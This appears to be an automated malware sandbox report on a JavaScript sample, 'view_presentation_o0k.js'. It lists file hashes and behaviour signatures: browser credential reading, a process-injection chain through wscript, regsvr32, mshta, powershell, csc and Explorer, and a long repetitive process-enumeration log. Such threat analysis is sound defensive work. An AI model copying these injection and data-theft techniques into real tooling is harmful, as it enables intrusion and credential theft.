Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10_x64 -
resource
win10v200410 -
submitted
18-04-2020 00:01
Static task
static1
Behavioral task
behavioral1
Sample
view_presentation_o0k.js
Resource
win7v200410
0 signatures
0 seconds
General
-
Target
view_presentation_o0k.js
-
Size
1.3MB
-
MD5
aa23220bc3897c8f3248f93e28291757
-
SHA1
5e630080abbfcb85d15d60aaf6560dfd5e0c4efd
-
SHA256
c3798c2190c4929eefccf38dbcd703cd83c6209de2ac98ae7421b2469ae71426
-
SHA512
2fe1a6476288a7249cdf81c89fb7215034e5cd2999bd26e6cfdadb601e9ac6cb13590c309dbe2c6fbba5a63690eb60e25f68746b4e0adda20cf7f3cd63b48a55
Malware Config
Signatures
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2912 PING.EXE -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4068 iexplore.exe 4068 iexplore.exe 4068 iexplore.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 3600 wrote to memory of 3916 3600 wscript.exe 68 PID 3600 wrote to memory of 3916 3600 wscript.exe 68 PID 3916 wrote to memory of 1720 3916 regsvr32.exe 69 PID 3916 wrote to memory of 1720 3916 regsvr32.exe 69 PID 3916 wrote to memory of 1720 3916 regsvr32.exe 69 PID 4068 wrote to memory of 3620 4068 iexplore.exe 72 PID 4068 wrote to memory of 3620 4068 iexplore.exe 72 PID 4068 wrote to memory of 3620 4068 iexplore.exe 72 PID 4068 wrote to memory of 3592 4068 iexplore.exe 73 PID 4068 wrote to memory of 3592 4068 iexplore.exe 73 PID 4068 wrote to memory of 3592 4068 iexplore.exe 73 PID 3856 wrote to memory of 504 3856 mshta.exe 76 PID 3856 wrote to memory of 504 3856 mshta.exe 76 PID 504 wrote to memory of 1224 504 powershell.exe 78 PID 504 wrote to memory of 1224 504 powershell.exe 78 PID 1224 wrote to memory of 1360 1224 csc.exe 79 PID 1224 wrote to memory of 1360 1224 csc.exe 79 PID 504 wrote to memory of 1520 504 powershell.exe 80 PID 504 wrote to memory of 1520 504 powershell.exe 80 PID 1520 wrote to memory of 1636 1520 csc.exe 81 PID 1520 wrote to memory of 1636 1520 csc.exe 81 PID 504 wrote to memory of 2992 504 powershell.exe 57 PID 504 wrote to memory of 2992 504 powershell.exe 57 PID 504 wrote to memory of 2992 504 powershell.exe 57 PID 2992 wrote to memory of 3460 2992 Explorer.EXE 60 PID 2992 wrote to memory of 2108 2992 Explorer.EXE 82 PID 2992 wrote to memory of 2108 2992 Explorer.EXE 82 PID 2992 wrote to memory of 2108 2992 Explorer.EXE 82 PID 2992 wrote to memory of 3460 2992 Explorer.EXE 60 PID 2992 wrote to memory of 3460 2992 Explorer.EXE 60 PID 2992 wrote to memory of 4068 2992 Explorer.EXE 71 PID 2992 wrote to memory of 4068 2992 Explorer.EXE 71 PID 2992 wrote to memory of 2108 2992 Explorer.EXE 82 PID 2992 wrote to memory of 4068 2992 Explorer.EXE 71 PID 2992 wrote to memory of 2108 2992 Explorer.EXE 82 PID 2108 wrote to memory of 2912 2108 cmd.exe 84 PID 2992 wrote to memory of 420 2992 Explorer.EXE 85 PID 2992 wrote to memory of 420 2992 Explorer.EXE 85 PID 2992 wrote to memory of 3164 2992 Explorer.EXE 86 PID 2992 wrote to memory of 3164 2992 Explorer.EXE 86 PID 2992 wrote to memory of 2720 2992 Explorer.EXE 91 PID 2992 wrote to memory of 2720 2992 Explorer.EXE 91 PID 2992 wrote to memory of 3132 2992 Explorer.EXE 93 PID 2992 wrote to memory of 3132 2992 Explorer.EXE 93 PID 2992 wrote to memory of 1048 2992 Explorer.EXE 95 PID 2992 wrote to memory of 1048 2992 Explorer.EXE 95 PID 2992 wrote to memory of 1048 2992 Explorer.EXE 95 PID 2992 wrote to memory of 1048 2992 Explorer.EXE 95 PID 2992 wrote to memory of 1048 2992 Explorer.EXE 95 -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeDebugPrivilege 504 powershell.exe Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE Token: SeShutdownPrivilege 2992 Explorer.EXE Token: SeCreatePagefilePrivilege 2992 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 1247 IoCs
pid Process 504 powershell.exe 504 powershell.exe 504 powershell.exe 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 